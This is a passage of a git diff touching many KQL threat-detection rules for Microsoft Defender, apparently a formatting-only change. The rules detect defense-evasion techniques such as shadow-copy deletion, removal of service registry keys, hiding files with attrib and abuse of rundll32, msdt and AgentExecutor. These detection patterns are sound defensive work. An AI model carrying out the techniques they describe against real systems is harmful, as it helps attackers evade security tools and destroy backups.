":\\Windows\\Tasks\\" or ProcessCommandLine contains ":\\Windows\\Temp\\" or ProcessCommandLine contains "\\AppData\\Local\\Temp\\") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/self_extraction_directive_file_created_in_potentially_suspicious_location.kql b/KQL/rules/Defense Evasion/self_extraction_directive_file_created_in_potentially_suspicious_location.kql index 6c230635..15b419c0 100644 --- a/KQL/rules/Defense Evasion/self_extraction_directive_file_created_in_potentially_suspicious_location.kql +++ b/KQL/rules/Defense Evasion/self_extraction_directive_file_created_in_potentially_suspicious_location.kql @@ -1,12 +1,12 @@ -// Title: Self Extraction Directive File Created In Potentially Suspicious Location -// Author: Joseliyo Sanchez, @Joseliyo_Jstnk -// Date: 2024-02-05 -// Level: medium -// Description: Detects the creation of Self Extraction Directive files (.sed) in a potentially suspicious location. -// These files are used by the "iexpress.exe" utility in order to create self extracting packages. -// Attackers were seen abusing this utility and creating PE files with embedded ".sed" entries. -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1218 - -DeviceFileEvents +// Title: Self Extraction Directive File Created In Potentially Suspicious Location +// Author: Joseliyo Sanchez, @Joseliyo_Jstnk +// Date: 2024-02-05 +// Level: medium +// Description: Detects the creation of Self Extraction Directive files (.sed) in a potentially suspicious location. +// These files are used by the "iexpress.exe" utility in order to create self extracting packages. +// Attackers were seen abusing this utility and creating PE files with embedded ".sed" entries. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218 + +DeviceFileEvents | where (FolderPath contains ":\\ProgramData\\" or FolderPath contains ":\\Temp\\" or FolderPath contains ":\\Windows\\System32\\Tasks\\" or FolderPath contains ":\\Windows\\Tasks\\" or FolderPath contains ":\\Windows\\Temp\\" or FolderPath contains "\\AppData\\Local\\Temp\\") and FolderPath endswith ".sed" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/service_registry_key_deleted_via_reg_exe.kql b/KQL/rules/Defense Evasion/service_registry_key_deleted_via_reg_exe.kql index e401310f..ad613d73 100644 --- a/KQL/rules/Defense Evasion/service_registry_key_deleted_via_reg_exe.kql +++ b/KQL/rules/Defense Evasion/service_registry_key_deleted_via_reg_exe.kql @@ -1,12 +1,12 @@ -// Title: Service Registry Key Deleted Via Reg.EXE -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022-08-01 -// Level: high -// Description: Detects execution of "reg.exe" commands with the "delete" flag on services registry key. Often used by attacker to remove AV software services -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1562.001 -// False Positives: -// - Unlikely - -DeviceProcessEvents +// Title: Service Registry Key Deleted Via Reg.EXE +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-08-01 +// Level: high +// Description: Detects execution of "reg.exe" commands with the "delete" flag on services registry key. Often used by attacker to remove AV software services +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1562.001 +// False Positives: +// - Unlikely + +DeviceProcessEvents | where ProcessCommandLine contains " delete " and (FolderPath endswith "reg.exe" or ProcessVersionInfoOriginalFileName =~ "reg.exe") and ProcessCommandLine contains "\\SYSTEM\\CurrentControlSet\\services\\" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/set_suspicious_files_as_system_files_using_attrib_exe.kql b/KQL/rules/Defense Evasion/set_suspicious_files_as_system_files_using_attrib_exe.kql index 3e47c582..30a985e6 100644 --- a/KQL/rules/Defense Evasion/set_suspicious_files_as_system_files_using_attrib_exe.kql +++ b/KQL/rules/Defense Evasion/set_suspicious_files_as_system_files_using_attrib_exe.kql @@ -1,10 +1,10 @@ -// Title: Set Suspicious Files as System Files Using Attrib.EXE -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022-06-28 -// Level: high -// Description: Detects the usage of attrib with the "+s" option to set scripts or executables located in suspicious locations as system files to hide them from users and make them unable to be deleted with simple rights. The rule limits the search to specific extensions and directories to avoid FPs -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1564.001 - -DeviceProcessEvents +// Title: Set Suspicious Files as System Files Using Attrib.EXE +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-06-28 +// Level: high +// Description: Detects the usage of attrib with the "+s" option to set scripts or executables located in suspicious locations as system files to hide them from users and make them unable to be deleted with simple rights. The rule limits the search to specific extensions and directories to avoid FPs +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1564.001 + +DeviceProcessEvents | where (ProcessCommandLine contains " +s" and (ProcessCommandLine contains ".bat" or ProcessCommandLine contains ".dll" or ProcessCommandLine contains ".exe" or ProcessCommandLine contains ".hta" or ProcessCommandLine contains ".ps1" or ProcessCommandLine contains ".vbe" or ProcessCommandLine contains ".vbs") and (FolderPath endswith "\\attrib.exe" or ProcessVersionInfoOriginalFileName =~ "ATTRIB.EXE") and (ProcessCommandLine contains " %" or ProcessCommandLine contains "\\Users\\Public\\" or ProcessCommandLine contains "\\AppData\\Local\\" or ProcessCommandLine contains "\\ProgramData\\" or ProcessCommandLine contains "\\Downloads\\" or ProcessCommandLine contains "\\Windows\\Temp\\")) and (not((ProcessCommandLine contains "\\Windows\\TEMP\\" and ProcessCommandLine contains ".exe"))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/setuid_and_setgid.kql b/KQL/rules/Defense Evasion/setuid_and_setgid.kql index f7065aab..5cb14d38 100644 --- a/KQL/rules/Defense Evasion/setuid_and_setgid.kql +++ b/KQL/rules/Defense Evasion/setuid_and_setgid.kql @@ -1,12 +1,12 @@ -// Title: Setuid and Setgid -// Author: Ömer Günal -// Date: 2020-06-16 -// Level: low -// Description: Detects suspicious change of file privileges with chown and chmod commands -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.persistence, attack.privilege-escalation, attack.t1548.001 -// False Positives: -// - Legitimate administration activities - -DeviceProcessEvents +// Title: Setuid and Setgid +// Author: Ömer Günal +// Date: 2020-06-16 +// Level: low +// Description: Detects suspicious change of file privileges with chown and chmod commands +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.persistence, attack.privilege-escalation, attack.t1548.001 +// False Positives: +// - Legitimate administration activities + +DeviceProcessEvents | where (ProcessCommandLine contains " chmod u+s" or ProcessCommandLine contains " chmod g+s") and ProcessCommandLine contains "chown root" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/shadow_copies_deletion_using_operating_systems_utilities.kql b/KQL/rules/Defense Evasion/shadow_copies_deletion_using_operating_systems_utilities.kql index 803df803..cc930614 100644 --- a/KQL/rules/Defense Evasion/shadow_copies_deletion_using_operating_systems_utilities.kql +++ b/KQL/rules/Defense Evasion/shadow_copies_deletion_using_operating_systems_utilities.kql @@ -1,13 +1,13 @@ -// Title: Shadow Copies Deletion Using Operating Systems Utilities -// Author: Florian Roth (Nextron Systems), Michael Haag, Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community, Andreas Hunkeler (@Karneades) -// Date: 2019-10-22 -// Level: high -// Description: Shadow Copies deletion using operating systems utilities -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.impact, attack.t1070, attack.t1490 -// False Positives: -// - Legitimate Administrator deletes Shadow Copies using operating systems utilities for legitimate reason -// - LANDesk LDClient Ivanti-PSModule (PS EncodedCommand) - -DeviceProcessEvents +// Title: Shadow Copies Deletion Using Operating Systems Utilities +// Author: Florian Roth (Nextron Systems), Michael Haag, Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community, Andreas Hunkeler (@Karneades) +// Date: 2019-10-22 +// Level: high +// Description: Shadow Copies deletion using operating systems utilities +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.impact, attack.t1070, attack.t1490 +// False Positives: +// - Legitimate Administrator deletes Shadow Copies using operating systems utilities for legitimate reason +// - LANDesk LDClient Ivanti-PSModule (PS EncodedCommand) + +DeviceProcessEvents | where ((ProcessCommandLine contains "shadow" and ProcessCommandLine contains "delete") and ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\wmic.exe" or FolderPath endswith "\\vssadmin.exe" or FolderPath endswith "\\diskshadow.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll", "wmic.exe", "VSSADMIN.EXE", "diskshadow.exe")))) or ((ProcessCommandLine contains "delete" and ProcessCommandLine contains "catalog" and ProcessCommandLine contains "quiet") and (FolderPath endswith "\\wbadmin.exe" or ProcessVersionInfoOriginalFileName =~ "WBADMIN.EXE")) or (((ProcessCommandLine contains "unbounded" or ProcessCommandLine contains "/MaxSize=") and (ProcessCommandLine contains "resize" and ProcessCommandLine contains "shadowstorage")) and (FolderPath endswith "\\vssadmin.exe" or ProcessVersionInfoOriginalFileName =~ "VSSADMIN.EXE")) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/shell32_dll_execution_in_suspicious_directory.kql b/KQL/rules/Defense Evasion/shell32_dll_execution_in_suspicious_directory.kql index a39bfd86..a249e1da 100644 --- a/KQL/rules/Defense Evasion/shell32_dll_execution_in_suspicious_directory.kql +++ b/KQL/rules/Defense Evasion/shell32_dll_execution_in_suspicious_directory.kql @@ -1,10 +1,10 @@ -// Title: Shell32 DLL Execution in Suspicious Directory -// Author: Christian Burkard (Nextron Systems) -// Date: 2021-11-24 -// Level: high -// Description: Detects shell32.dll executing a DLL in a suspicious directory -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.execution, attack.t1218.011 - -DeviceProcessEvents +// Title: Shell32 DLL Execution in Suspicious Directory +// Author: Christian Burkard (Nextron Systems) +// Date: 2021-11-24 +// Level: high +// Description: Detects shell32.dll executing a DLL in a suspicious directory +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.execution, attack.t1218.011 + +DeviceProcessEvents | where ((ProcessCommandLine contains "%AppData%" or ProcessCommandLine contains "%LocalAppData%" or ProcessCommandLine contains "%Temp%" or ProcessCommandLine contains "%tmp%" or ProcessCommandLine contains "\\AppData\\" or ProcessCommandLine contains "\\Temp\\" or ProcessCommandLine contains "\\Users\\Public\\") and (ProcessCommandLine contains "shell32.dll" and ProcessCommandLine contains "Control_RunDLL")) and (FolderPath endswith "\\rundll32.exe" or ProcessVersionInfoOriginalFileName =~ "RUNDLL32.EXE") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/space_after_filename_macos.kql b/KQL/rules/Defense Evasion/space_after_filename_macos.kql index 7bc2ca3c..6dce835b 100644 --- a/KQL/rules/Defense Evasion/space_after_filename_macos.kql +++ b/KQL/rules/Defense Evasion/space_after_filename_macos.kql @@ -1,12 +1,12 @@ -// Title: Space After Filename - macOS -// Author: remotephone -// Date: 2021-11-20 -// Level: low -// Description: Detects attempts to masquerade as legitimate files by adding a space to the end of the filename. -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1036.006 -// False Positives: -// - Mistyped commands or legitimate binaries named to match the pattern - -DeviceProcessEvents +// Title: Space After Filename - macOS +// Author: remotephone +// Date: 2021-11-20 +// Level: low +// Description: Detects attempts to masquerade as legitimate files by adding a space to the end of the filename. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1036.006 +// False Positives: +// - Mistyped commands or legitimate binaries named to match the pattern + +DeviceProcessEvents | where ProcessCommandLine endswith " " or FolderPath endswith " " \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/start_of_nt_virtual_dos_machine.kql b/KQL/rules/Defense Evasion/start_of_nt_virtual_dos_machine.kql index 3df69197..a7af8e0c 100644 --- a/KQL/rules/Defense Evasion/start_of_nt_virtual_dos_machine.kql +++ b/KQL/rules/Defense Evasion/start_of_nt_virtual_dos_machine.kql @@ -1,12 +1,12 @@ -// Title: Start of NT Virtual DOS Machine -// Author: frack113 -// Date: 2022-07-16 -// Level: medium -// Description: Ntvdm.exe allows the execution of 16-bit Windows applications on 32-bit Windows operating systems, as well as the execution of both 16-bit and 32-bit DOS applications -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion -// False Positives: -// - Legitimate use - -DeviceProcessEvents +// Title: Start of NT Virtual DOS Machine +// Author: frack113 +// Date: 2022-07-16 +// Level: medium +// Description: Ntvdm.exe allows the execution of 16-bit Windows applications on 32-bit Windows operating systems, as well as the execution of both 16-bit and 32-bit DOS applications +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion +// False Positives: +// - Legitimate use + +DeviceProcessEvents | where FolderPath endswith "\\ntvdm.exe" or FolderPath endswith "\\csrstub.exe" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/suspect_svchost_activity.kql b/KQL/rules/Defense Evasion/suspect_svchost_activity.kql index 79d7382e..88b04fa2 100644 --- a/KQL/rules/Defense Evasion/suspect_svchost_activity.kql +++ b/KQL/rules/Defense Evasion/suspect_svchost_activity.kql @@ -1,12 +1,12 @@ -// Title: Suspect Svchost Activity -// Author: David Burkett, @signalblur -// Date: 2019-12-28 -// Level: high -// Description: It is extremely abnormal for svchost.exe to spawn without any CLI arguments and is normally observed when a malicious process spawns the process and injects code into the process memory space. -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1055 -// False Positives: -// - Rpcnet.exe / rpcnetp.exe which is a lojack style software. https://www.blackhat.com/docs/us-14/materials/us-14-Kamlyuk-Kamluk-Computrace-Backdoor-Revisited.pdf - -DeviceProcessEvents +// Title: Suspect Svchost Activity +// Author: David Burkett, @signalblur +// Date: 2019-12-28 +// Level: high +// Description: It is extremely abnormal for svchost.exe to spawn without any CLI arguments and is normally observed when a malicious process spawns the process and injects code into the process memory space. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1055 +// False Positives: +// - Rpcnet.exe / rpcnetp.exe which is a lojack style software. https://www.blackhat.com/docs/us-14/materials/us-14-Kamlyuk-Kamluk-Computrace-Backdoor-Revisited.pdf + +DeviceProcessEvents | where (ProcessCommandLine endswith "svchost.exe" and FolderPath endswith "\\svchost.exe") and (not(((InitiatingProcessFolderPath endswith "\\rpcnet.exe" or InitiatingProcessFolderPath endswith "\\rpcnetp.exe") or isnull(ProcessCommandLine)))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/suspicious_advpack_call_via_rundll32_exe.kql b/KQL/rules/Defense Evasion/suspicious_advpack_call_via_rundll32_exe.kql index 2fcd7b4d..d641f110 100644 --- a/KQL/rules/Defense Evasion/suspicious_advpack_call_via_rundll32_exe.kql +++ b/KQL/rules/Defense Evasion/suspicious_advpack_call_via_rundll32_exe.kql @@ -1,12 +1,12 @@ -// Title: Suspicious Advpack Call Via Rundll32.EXE -// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) -// Date: 2023-05-17 -// Level: high -// Description: Detects execution of "rundll32" calling "advpack.dll" with potential obfuscated ordinal calls in order to leverage the "RegisterOCX" function -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion -// False Positives: -// - Unlikely - -DeviceProcessEvents +// Title: Suspicious Advpack Call Via Rundll32.EXE +// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-05-17 +// Level: high +// Description: Detects execution of "rundll32" calling "advpack.dll" with potential obfuscated ordinal calls in order to leverage the "RegisterOCX" function +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion +// False Positives: +// - Unlikely + +DeviceProcessEvents | where ProcessCommandLine contains "advpack" and ((ProcessCommandLine contains "#+" and ProcessCommandLine contains "12") or ProcessCommandLine contains "#-") and (FolderPath endswith "\\rundll32.exe" or ProcessVersionInfoOriginalFileName =~ "RUNDLL32.EXE" or ProcessCommandLine contains "rundll32") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/suspicious_agentexecutor_powershell_execution.kql b/KQL/rules/Defense Evasion/suspicious_agentexecutor_powershell_execution.kql index 14fcb2bd..206aa4dd 100644 --- a/KQL/rules/Defense Evasion/suspicious_agentexecutor_powershell_execution.kql +++ b/KQL/rules/Defense Evasion/suspicious_agentexecutor_powershell_execution.kql @@ -1,10 +1,10 @@ -// Title: Suspicious AgentExecutor PowerShell Execution -// Author: Nasreddine Bencherchali (Nextron Systems), memory-shards -// Date: 2022-12-24 -// Level: high -// Description: Detects execution of the AgentExecutor.exe binary. Which can be abused as a LOLBIN to execute powershell scripts with the ExecutionPolicy "Bypass" or any binary named "powershell.exe" located in the path provided by 6th positional argument -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1218 - -DeviceProcessEvents +// Title: Suspicious AgentExecutor PowerShell Execution +// Author: Nasreddine Bencherchali (Nextron Systems), memory-shards +// Date: 2022-12-24 +// Level: high +// Description: Detects execution of the AgentExecutor.exe binary. Which can be abused as a LOLBIN to execute powershell scripts with the ExecutionPolicy "Bypass" or any binary named "powershell.exe" located in the path provided by 6th positional argument +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218 + +DeviceProcessEvents | where ((ProcessCommandLine contains " -powershell" or ProcessCommandLine contains " -remediationScript") and (FolderPath endswith "\\AgentExecutor.exe" or ProcessVersionInfoOriginalFileName =~ "AgentExecutor.exe")) and (not((InitiatingProcessFolderPath endswith "\\Microsoft.Management.Services.IntuneWindowsAgent.exe" or (ProcessCommandLine contains "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\" or ProcessCommandLine contains "C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\")))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/suspicious_application_allowed_through_exploit_guard.kql b/KQL/rules/Defense Evasion/suspicious_application_allowed_through_exploit_guard.kql index 1e09ffa9..23296f4e 100644 --- a/KQL/rules/Defense Evasion/suspicious_application_allowed_through_exploit_guard.kql +++ b/KQL/rules/Defense Evasion/suspicious_application_allowed_through_exploit_guard.kql @@ -1,12 +1,12 @@ -// Title: Suspicious Application Allowed Through Exploit Guard -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022-08-05 -// Level: high -// Description: Detects applications being added to the "allowed applications" list of exploit guard in order to bypass controlled folder settings -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1562.001 -// False Positives: -// - Unlikely - -DeviceRegistryEvents +// Title: Suspicious Application Allowed Through Exploit Guard +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-08-05 +// Level: high +// Description: Detects applications being added to the "allowed applications" list of exploit guard in order to bypass controlled folder settings +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1562.001 +// False Positives: +// - Unlikely + +DeviceRegistryEvents | where RegistryKey contains "SOFTWARE\\Microsoft\\Windows Defender\\Windows Defender Exploit Guard\\Controlled Folder Access\\AllowedApplications" and (RegistryKey endswith "\\Users\\Public*" or RegistryKey endswith "\\AppData\\Local\\Temp*" or RegistryKey endswith "\\Desktop*" or RegistryKey endswith "\\PerfLogs*" or RegistryKey endswith "\\Windows\\Temp*") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/suspicious_bitlocker_access_agent_update_utility_execution.kql b/KQL/rules/Defense Evasion/suspicious_bitlocker_access_agent_update_utility_execution.kql index 2344db98..a8b9d805 100644 --- a/KQL/rules/Defense Evasion/suspicious_bitlocker_access_agent_update_utility_execution.kql +++ b/KQL/rules/Defense Evasion/suspicious_bitlocker_access_agent_update_utility_execution.kql @@ -1,11 +1,11 @@ -// Title: Suspicious BitLocker Access Agent Update Utility Execution -// Author: andrewdanis, Swachchhanda Shrawan Poudel (Nextron Systems) -// Date: 2025-10-18 -// Level: high -// Description: Detects the execution of the BitLocker Access Agent Update Utility (baaupdate.exe) which is not a common parent process for other processes. -// Suspicious child processes spawned by baaupdate.exe could indicate an attempt at lateral movement via BitLocker DCOM & COM Hijacking. -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1218, attack.lateral-movement, attack.t1021.003 - -DeviceProcessEvents +// Title: Suspicious BitLocker Access Agent Update Utility Execution +// Author: andrewdanis, Swachchhanda Shrawan Poudel (Nextron Systems) +// Date: 2025-10-18 +// Level: high +// Description: Detects the execution of the BitLocker Access Agent Update Utility (baaupdate.exe) which is not a common parent process for other processes. +// Suspicious child processes spawned by baaupdate.exe could indicate an attempt at lateral movement via BitLocker DCOM & COM Hijacking. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218, attack.lateral-movement, attack.t1021.003 + +DeviceProcessEvents | where (FolderPath endswith "\\bitsadmin.exe" or FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\powershell_ise.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\schtasks.exe" or FolderPath endswith "\\wmic.exe" or FolderPath endswith "\\wscript.exe") and InitiatingProcessFolderPath endswith "\\baaupdate.exe" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/suspicious_cabinet_file_execution_via_msdt_exe.kql b/KQL/rules/Defense Evasion/suspicious_cabinet_file_execution_via_msdt_exe.kql index bad7a535..14d6f073 100644 --- a/KQL/rules/Defense Evasion/suspicious_cabinet_file_execution_via_msdt_exe.kql +++ b/KQL/rules/Defense Evasion/suspicious_cabinet_file_execution_via_msdt_exe.kql @@ -1,12 +1,12 @@ -// Title: Suspicious Cabinet File Execution Via Msdt.EXE -// Author: Nasreddine Bencherchali (Nextron Systems), GossiTheDog, frack113 -// Date: 2022-06-21 -// Level: medium -// Description: Detects execution of msdt.exe using the "cab" flag which could indicates suspicious diagcab files with embedded answer files leveraging CVE-2022-30190 -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1202 -// False Positives: -// - Legitimate usage of ".diagcab" files - -DeviceProcessEvents +// Title: Suspicious Cabinet File Execution Via Msdt.EXE +// Author: Nasreddine Bencherchali (Nextron Systems), GossiTheDog, frack113 +// Date: 2022-06-21 +// Level: medium +// Description: Detects execution of msdt.exe using the "cab" flag which could indicates suspicious diagcab files with embedded answer files leveraging CVE-2022-30190 +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1202 +// False Positives: +// - Legitimate usage of ".diagcab" files + +DeviceProcessEvents | where (ProcessCommandLine contains " -cab " or ProcessCommandLine contains " /cab " or ProcessCommandLine contains " –cab " or ProcessCommandLine contains " —cab " or ProcessCommandLine contains " ―cab ") and (FolderPath endswith "\\msdt.exe" or ProcessVersionInfoOriginalFileName =~ "msdt.exe") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/suspicious_calculator_usage.kql b/KQL/rules/Defense Evasion/suspicious_calculator_usage.kql index 11de8336..f1415e43 100644 --- a/KQL/rules/Defense Evasion/suspicious_calculator_usage.kql +++ b/KQL/rules/Defense Evasion/suspicious_calculator_usage.kql @@ -1,10 +1,10 @@ -// Title: Suspicious Calculator Usage -// Author: Florian Roth (Nextron Systems) -// Date: 2019-02-09 -// Level: high -// Description: Detects suspicious use of 'calc.exe' with command line parameters or in a suspicious directory, which is likely caused by some PoC or detection evasion. -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1036 - -DeviceProcessEvents +// Title: Suspicious Calculator Usage +// Author: Florian Roth (Nextron Systems) +// Date: 2019-02-09 +// Level: high +// Description: Detects suspicious use of 'calc.exe' with command line parameters or in a suspicious directory, which is likely caused by some PoC or detection evasion. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1036 + +DeviceProcessEvents | where ProcessCommandLine contains "\\calc.exe " or (FolderPath endswith "\\calc.exe" and (not((FolderPath contains ":\\Windows\\System32\\" or FolderPath contains ":\\Windows\\SysWOW64\\" or FolderPath contains ":\\Windows\\WinSxS\\")))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/suspicious_child_process_created_as_system.kql b/KQL/rules/Defense Evasion/suspicious_child_process_created_as_system.kql index 884bc1cc..1d313013 100644 --- a/KQL/rules/Defense Evasion/suspicious_child_process_created_as_system.kql +++ b/KQL/rules/Defense Evasion/suspicious_child_process_created_as_system.kql @@ -1,10 +1,10 @@ -// Title: Suspicious Child Process Created as System -// Author: Teymur Kheirkhabarov, Roberto Rodriguez (@Cyb3rWard0g), Open Threat Research (OTR) -// Date: 2019-10-26 -// Level: high -// Description: Detection of child processes spawned with SYSTEM privileges by parents with LOCAL SERVICE or NETWORK SERVICE accounts -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1134.002 - -DeviceProcessEvents +// Title: Suspicious Child Process Created as System +// Author: Teymur Kheirkhabarov, Roberto Rodriguez (@Cyb3rWard0g), Open Threat Research (OTR) +// Date: 2019-10-26 +// Level: high +// Description: Detection of child processes spawned with SYSTEM privileges by parents with LOCAL SERVICE or NETWORK SERVICE accounts +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1134.002 + +DeviceProcessEvents | where ((ProcessIntegrityLevel in~ ("System", "S-1-16-16384")) and (InitiatingProcessAccountName contains "AUTHORI" or InitiatingProcessAccountName contains "AUTORI") and ((InitiatingProcessAccountName =~ "NETWORK SERVICE" and InitiatingProcessAccountDomain startswith "") or (InitiatingProcessAccountName =~ "LOCAL SERVICE" and InitiatingProcessAccountDomain startswith "")) and (AccountName contains "AUTHORI" or AccountName contains "AUTORI") and ((AccountName =~ "SYSTEM" and AccountDomain startswith "") or (AccountName =~ "Système" and AccountDomain startswith "") or (AccountName =~ "СИСТЕМА" and AccountDomain startswith ""))) and (not((ProcessCommandLine contains "DavSetCookie" and FolderPath endswith "\\rundll32.exe"))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/suspicious_child_process_of_aspnetcompiler.kql b/KQL/rules/Defense Evasion/suspicious_child_process_of_aspnetcompiler.kql index db1a868c..508b59e7 100644 --- a/KQL/rules/Defense Evasion/suspicious_child_process_of_aspnetcompiler.kql +++ b/KQL/rules/Defense Evasion/suspicious_child_process_of_aspnetcompiler.kql @@ -1,10 +1,10 @@ -// Title: Suspicious Child Process of AspNetCompiler -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023-08-14 -// Level: high -// Description: Detects potentially suspicious child processes of "aspnet_compiler.exe". -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1127 - -DeviceProcessEvents +// Title: Suspicious Child Process of AspNetCompiler +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-08-14 +// Level: high +// Description: Detects potentially suspicious child processes of "aspnet_compiler.exe". +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1127 + +DeviceProcessEvents | where ((FolderPath endswith "\\calc.exe" or FolderPath endswith "\\notepad.exe") or (FolderPath contains "\\Users\\Public\\" or FolderPath contains "\\AppData\\Local\\Temp\\" or FolderPath contains "\\AppData\\Local\\Roaming\\" or FolderPath contains ":\\Temp\\" or FolderPath contains ":\\Windows\\Temp\\" or FolderPath contains ":\\Windows\\System32\\Tasks\\" or FolderPath contains ":\\Windows\\Tasks\\")) and InitiatingProcessFolderPath endswith "\\aspnet_compiler.exe" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/suspicious_child_process_of_wermgr_exe.kql b/KQL/rules/Defense Evasion/suspicious_child_process_of_wermgr_exe.kql index 252212e7..ef291be5 100644 --- a/KQL/rules/Defense Evasion/suspicious_child_process_of_wermgr_exe.kql +++ b/KQL/rules/Defense Evasion/suspicious_child_process_of_wermgr_exe.kql @@ -1,10 +1,10 @@ -// Title: Suspicious Child Process Of Wermgr.EXE -// Author: Florian Roth (Nextron Systems) -// Date: 2022-10-14 -// Level: high -// Description: Detects suspicious Windows Error Reporting manager (wermgr.exe) child process -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1055, attack.t1036 - -DeviceProcessEvents +// Title: Suspicious Child Process Of Wermgr.EXE +// Author: Florian Roth (Nextron Systems) +// Date: 2022-10-14 +// Level: high +// Description: Detects suspicious Windows Error Reporting manager (wermgr.exe) child process +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1055, attack.t1036 + +DeviceProcessEvents | where ((FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\ipconfig.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\net.exe" or FolderPath endswith "\\net1.exe" or FolderPath endswith "\\netstat.exe" or FolderPath endswith "\\nslookup.exe" or FolderPath endswith "\\powershell_ise.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\systeminfo.exe" or FolderPath endswith "\\whoami.exe" or FolderPath endswith "\\wscript.exe") and InitiatingProcessFolderPath endswith "\\wermgr.exe") and (not(((ProcessCommandLine contains "-queuereporting" or ProcessCommandLine contains "-responsepester") and (ProcessCommandLine contains "C:\\Windows\\system32\\WerConCpl.dll" and ProcessCommandLine contains "LaunchErcApp ") and FolderPath endswith "\\rundll32.exe"))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/suspicious_codepage_switch_via_chcp.kql b/KQL/rules/Defense Evasion/suspicious_codepage_switch_via_chcp.kql index 90ae16f1..e60204e9 100644 --- a/KQL/rules/Defense Evasion/suspicious_codepage_switch_via_chcp.kql +++ b/KQL/rules/Defense Evasion/suspicious_codepage_switch_via_chcp.kql @@ -1,12 +1,12 @@ -// Title: Suspicious CodePage Switch Via CHCP -// Author: Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community -// Date: 2019-10-14 -// Level: medium -// Description: 